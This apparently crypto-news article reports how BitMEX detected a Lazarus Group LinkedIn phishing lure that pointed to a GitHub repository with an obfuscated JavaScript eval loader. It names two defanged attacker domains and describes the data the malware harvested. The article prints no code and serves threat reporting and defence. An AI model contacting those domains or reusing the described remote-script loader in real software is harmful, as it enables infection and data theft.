BitMEX has successfully thwarted a phishing attack from the notorious North Korean hacking group Lazarus, which disguised its attempt as a professional outreach for an NFT marketplace collaboration on LinkedIn.
According to a report by BitMEX’s team, a company employee received an unsolicited message that quickly raised red flags.
The message invited them to collaborate on a Web3 project and directed them to a private GitHub repository filled with malicious code.Â
Recognizing the familiar patterns of Lazarus-linked social engineering, the employee flagged the communication, prompting a deeper investigation.Â
BitMEX labeled the initial approach as “unsophisticated,” highlighting Lazarus’s reliance on basic phishing tactics as the entry point into more complex exploitation campaigns.
Investigation Reveals Embedded Malware and Lazarus Infrastructure
Upon inspecting the GitHub repository, BitMEX researchers uncovered obfuscated JavaScript code embedded within a seemingly benign Next.js/React website.
The code included eval functions capable of executing remote scripts sourced from previously identified Lazarus-controlled domains such as regioncheck[.]net and fashdefi[.]store.
Using tools like WebCrack, the team deobfuscated the code, revealing that it harvested sensitive metadata, such as usernames, IP addresses, hostnames, geolocation, and OS info, and stored it in an open Supabase database.
The infrastructure vulnerability proved to be a critical mistake for the hackers, as it allowed BitMEX to access and analyze data from compromised machines, shedding light on victim profiles and the broader scope of the campaign.
Also Read: North Korean Hacker Group Lazarus Exploits US Shell Companies to Hire and Defraud Crypto Developers
Lazarus’s Operational Mistakes Expose Their Tracks
BitMEX’s investigation unearthed significant operational security lapses within the Lazarus operation.
Logs from the exposed Supabase instance revealed over 850 entries dating back to March 31, 2025, including 174 unique compromised devices.
The team discovered that many infected systems reused usernames and hostnames, suggesting poor internal hygiene or testing processes by the attackers.
In a rare slip-up, one infection was traced back to a residential China Mobile IP address in Jiaxing, China, deviating from the usual VPN-based anonymization.
The check exposed the potential real-world location of an operator tied to the alias “Victor.” Such leaks are uncommon for state-sponsored cyber groups and underscore inconsistencies in the Lazarus Group’s operational discipline.
Sophistication in Layers: Basic Entry, Complex Post-Exploitation
While Lazarus Group is often linked to some of the most impactful crypto heists, including breaches of Stake, Bybit, and Phemex, their attacks often start with deceptively simple techniques like phishing.
BitMEX’s report highlights this pattern, emphasizing a clear divide between the group’s entry-level operatives and its advanced post-exploitation teams.
Once access is achieved, a more sophisticated faction typically takes over, as seen in previous incidents where they infiltrated AWS accounts or tampered with wallet interfaces.
BitMEX’s defense not only neutralized this specific attack but also allowed researchers to monitor infection patterns and track attacker activity, reinforcing the importance of proactive threat detection in the crypto sector.
Also Read: Lazarus Group’s Bybit Hack Boosts North Korea’s Bitcoin Assets To Over $1.13 Billion